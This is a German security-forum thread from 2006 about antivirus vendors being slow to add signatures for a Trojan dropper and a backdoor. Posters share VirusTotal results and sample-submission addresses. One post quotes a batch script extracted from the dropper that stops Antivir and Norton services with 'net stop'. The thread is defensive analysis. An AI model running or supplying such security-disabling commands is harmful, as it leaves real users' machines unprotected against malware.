Trojan-Dropper.Win32.MultiJoiner.13.j, nicht Wert eingepflegt zu werden? Einstellungen

[Stefan]

Vor gut 3 Wochen habe ich mal eine vermeintliche Bilddatei auf Jottis und Virustotal scannen lassen und anschließend an BitDefender gesandt.
Bis heute hat sich dort und auch bei einigen anderen anscheinend nichts getan.

Frage daher: Ist so ein Schädling es nicht Wert eingepflegt zu werden, oder gibt es im Moment einfach nur zu viel andere Malware die eingepflegt werden muss?




Kaspersky hat den Trojan-Dropper übrigens schon am 10.März entdeckt.

[JFK]

Frage daher: Ist so ein Schädling es nicht Wert eingepflegt zu werden, oder gibt es im Moment einfach nur zu viel andere Malware die eingepflegt werden muss?
[right][snapback]145089[/snapback][/right]

Natürlich ist es wert einen Schädling einzupflegen, sonst macht das AV Programm ja kaum einen Sinn
Die Geschäftsphilosophie einzelner Unternehmen ist eben unterschiedlich gestaltet, wegen dem "Wieso?" würde ich mal bei Bitdefender nachfragen.

JFK

[Domino]

Andererseits ist bei den meisten gerade polipos die Priorität.




Domino

[Gast_skep_*]

Ich hab hier auch so ein Kandidaten der nur von einigen erkannt wird. Laut Virustotal wird der Backdoor u.a. nicht von Avast, AVG, Bitdefender, DrWeb, NOD32v2, Panda, Sophos erkannt..und dies seit Wochen schon. Hab ihn zwar nirgends eingeschickt, aber da ich mehrmals in meinen Apache-Logs Hinweise auf diesen fand, kann das Teil ja nicht soo unbekannt sein.
Handeln tut es sich um:
BDS/Katien.R bzw. Backdoor.Tsunami.w, Backdoor.Kaitex ect. ..scheint ein Backdoor zu sein, den es schon seit 2001 gibt..

Der Beitrag wurde von skep bearbeitet: 25.04.2006, 11:24

[Voyager]

hab mir die Malware von Stefan mal schicken lassen .
die 314kb com-datei wird hier selbst nicht erkannt aber wenn ich sie im Gast-modus (wo ich keinerlei rechte besitze) starte werden einige sachen daraus gestartet ,darunter eine schmuddlige bilddatei und 2 rar-sfx dateien.
eine rar-sfx datei wird sofort erkannt als :

Quelle: danz6.exe
Klicken Sie hier, um weitere Informationen über dieses Risiko zu erhalten: Backdoor.Trojan
Durchgeführte Aktion: Gelöscht

bei der zweiten kommt eine rar-installer GUI die ich aber abgebrochen hatte. wenn ich jedoch da reinschaue kommt eine stille informationsanleitung zum vorschein, das heisst das rar-sfx hätte sich im silentmodus starten sollen.
darunter auch eine batch-datei die weitere malware installieren soll und ......

@echo off
start /min cmd /c net stop "Antivir Service" 2>nul
start /min cmd /c net stop antivirService 2>nul
#################
start /min cmd /c net stop "Antivir Scheduler" 2>nul
######dfgsdafaag
start /min cmd /c net stop navapsvc 2>nul
####start    /min cmd /c net stop jkfdlkjfdlkjfdslkg 2>nul
start /min cmd /c net stop "AntiVir PersonalEdition Classic Service" 2>nul
exit

Antivir killen sollte

p.s. die *.com selbst hab ich an symantec eingeschickt .

Der Beitrag wurde von bond7 bearbeitet: 25.04.2006, 12:51

[drweb-online]

Bitte die Datei an vms(at)drweb.com senden mit dem Subject "New Virus".

Danke
Michael

[Voyager]

ist abgeschickt , das passwort zum öffnen liegt bei.

[Lucky]

hab mir die Malware von Stefan mal schicken lassen  .
die 314kb com-datei wird hier selbst nicht erkannt aber wenn ich sie im Gast-modus (wo ich keinerlei rechte besitze) starte werden
[right][snapback]145156[/snapback][/right]

Doch hoffentlich nicht auf deinem Produktivsystem? Denn auch mit nur Gastrechten, kan man sich was einfangen...

Lucky

[Voyager]

auch mit nur Gastrechten, kan man sich was einfangen...

Möglichwerweise , aber die Wahrscheinlichkeit dazu ist eher gering weil die Zugriffs- und Schreibberechtigung zu niedrig ist.
Ich hab aber trotzdem alles kontrolliert , möchtest du mein Log nochmal gegenprüfen?

Der Beitrag wurde von bond7 bearbeitet: 25.04.2006, 14:34

[Stefan]

Na wie ich sehe scheint ja wenigstens einer der acht, die den Dropper nicht erkennen, Interesse zu zeigen.

[Gast_skep_*]

Den von mir weiter oben erwaehnten Backdoor erkennt DrWeb nun auch (BackDoor.Tsui)

[Kyu]

Was bitdefender angeht gibts zwei möglichkeiten. über das programm hochladen und abschicken, dann landet es im labor in rumänien (reaktionzeit war bei mir immer innerhalb von ca 1-2 tagen jedoch ohne feedback) - oder mit beigefügtem pw versehen an support@bitdefender.de - dann dauerts paar std länger, aber man bekommt feedback (ticket usw).

welchen weg hast du denn genommen?

[Stefan]

welchen weg hast du denn genommen?
[right][snapback]145239[/snapback][/right]

Ich hatte das Archiv mit PW versehen an virus_submission(at)bitdefender.com geschickt.

[Kyu]

die eingesandten verdachtsfälle über das programm landen übrigens direkt bei den technikern in rumänien. die nehmen die dinger nur ausseinander und bauen sie gleich in neuen signaturen ein, daher bekommt man darauf auch kein feedback. wer wert auf feedback legt soll sein zeug gepackt an support@bitdefender.de schicken.

hab gerade nochmal nachgeguckt welche adresse beim letzten gespräch angegeben wurde. keine ahnung wie das mit virus_submission ist.
falls du nochmal sowas hast kannst dus vielleicht über support@ versuchen =)

[Stefan]

Wenn ich an die letzten Einsendungen an "support(at)bitdefender.de" denke, belief sich das Feedback darauf, dass es eine Bestätigung des Verdachts auf Malware gab und man ein zügiges Bereitstellen einer Signatur versprach. Ne knappe Woche hat es dann trotzdem noch gedauert.

Ach ja, in der Mail gab es übrigens auch noch den Hinweis, dass wenn man Dateien direkt an "virus_submission(at)bitdefender.com" senden würde, man dort schneller reagieren könnte.

Der Beitrag wurde von Stefan bearbeitet: 25.04.2006, 21:00

[Gast_blueX_*]

@stefan
@skep
@bond

http://www.rokop-security.de/index.php?showtopic=8685

Ich habe mir einmal die genannten Adressen als Fließtext angelegt, so dass ich nur den Fließtext einkopiert habe.
Solltet ihr Interesse habe, dann schick ich euch den Fließtext und keine Arbeit habt.

[Kyu]

na dann mal sehen wie lang es noch dauert =)

[Stefan]

Übrigens bei Dr.Web hat man sich Mühe gegeben.
Der Dropper wird jetzt als "Trojan.MulDrop.3684" erkannt.

[Gast_rock_*]

ich frag mich schon seit langem wie diese uploadscanner arbeiten...

hab aus meinen set mal den stubby (ein ganz altes klumpert) hochgeladen...

und KEINER erkennts plötzlich!

STATUS: FINISHEDComplete scanning result of "stubby_d.exe", received in VirusTotal at 04.27.2006, 10:12:20 (CET).

Antivirus Version Update Result
AntiVir 6.34.0.24 04.20.2006 no virus found
Avast 4.6.695.0 04.26.2006 no virus found
AVG 386 04.26.2006 no virus found
Avira 6.34.1.58 04.27.2006 no virus found
BitDefender 7.2 04.27.2006 no virus found
CAT-QuickHeal 8.00 04.26.2006 no virus found
ClamAV devel-20060202 04.26.2006 no virus found
DrWeb 4.33 04.27.2006 no virus found
eTrust-InoculateIT 23.71.140 04.27.2006 no virus found
eTrust-Vet 12.4.2181 04.27.2006 no virus found
Ewido 3.5 04.27.2006 no virus found
Fortinet 2.71.0.0 04.27.2006 no virus found
F-Prot 3.16c 04.26.2006 no virus found
Ikarus 0.2.59.0 04.26.2006 no virus found
Kaspersky 4.0.2.24 04.27.2006 no virus found
McAfee 4749 04.26.2006 no virus found
NOD32v2 1.1509 04.27.2006 no virus found
Norman 5.90.17 04.26.2006 no virus found
Panda 9.0.0.4 04.27.2006 no virus found
Sophos 4.05.0 04.27.2006 no virus found
Symantec 8.0 04.27.2006 no virus found
TheHacker 5.9.7.135 04.25.2006 no virus found
UNA 1.83 04.26.2006 no virus found
VBA32 3.11.0 04.26.2006 no virus found

mein mc afee springt aber natürlich sofort an, wenn ich ihn entpacken will!

[Gast_rock_*]

hier detto! mc afee knallt sofort an! zwar nur ein passwort tool, jedoch...NICHTS GEFUNDEN!

STATUS: FINISHEDComplete scanning result of "RiskWare.PSWTool.Snitch.11.exe", received in VirusTotal at 04.27.2006, 10:29:06 (CET).

Antivirus Version Update Result
AntiVir 6.34.0.24 04.20.2006 no virus found
Avast 4.6.695.0 04.26.2006 no virus found
AVG 386 04.26.2006 no virus found
Avira 6.34.1.58 04.27.2006 no virus found
BitDefender 7.2 04.27.2006 no virus found
CAT-QuickHeal 8.00 04.26.2006 no virus found
ClamAV devel-20060202 04.26.2006 no virus found
DrWeb 4.33 04.27.2006 no virus found
eTrust-InoculateIT 23.71.140 04.27.2006 no virus found
eTrust-Vet 12.4.2181 04.27.2006 no virus found
Ewido 3.5 04.27.2006 no virus found
Fortinet 2.71.0.0 04.27.2006 no virus found
F-Prot 3.16c 04.26.2006 no virus found
Ikarus 0.2.59.0 04.26.2006 no virus found
Kaspersky 4.0.2.24 04.27.2006 no virus found
McAfee 4749 04.26.2006 no virus found
NOD32v2 1.1509 04.27.2006 no virus found
Norman 5.90.17 04.26.2006 no virus found
Panda 9.0.0.4 04.27.2006 no virus found
Sophos 4.05.0 04.27.2006 no virus found
Symantec 8.0 04.27.2006 no virus found
TheHacker 5.9.7.135 04.25.2006 no virus found
UNA 1.83 04.26.2006 no virus found
VBA32 3.11.0 04.26.2006 no virus found
_____________________________

dieses tool wurde seinezeit von kaspersky als solches wie es im text steht erkannt!

rock

edit: bild von aktueller mc afee erkennung:


Der Beitrag wurde von rock bearbeitet: 27.04.2006, 09:36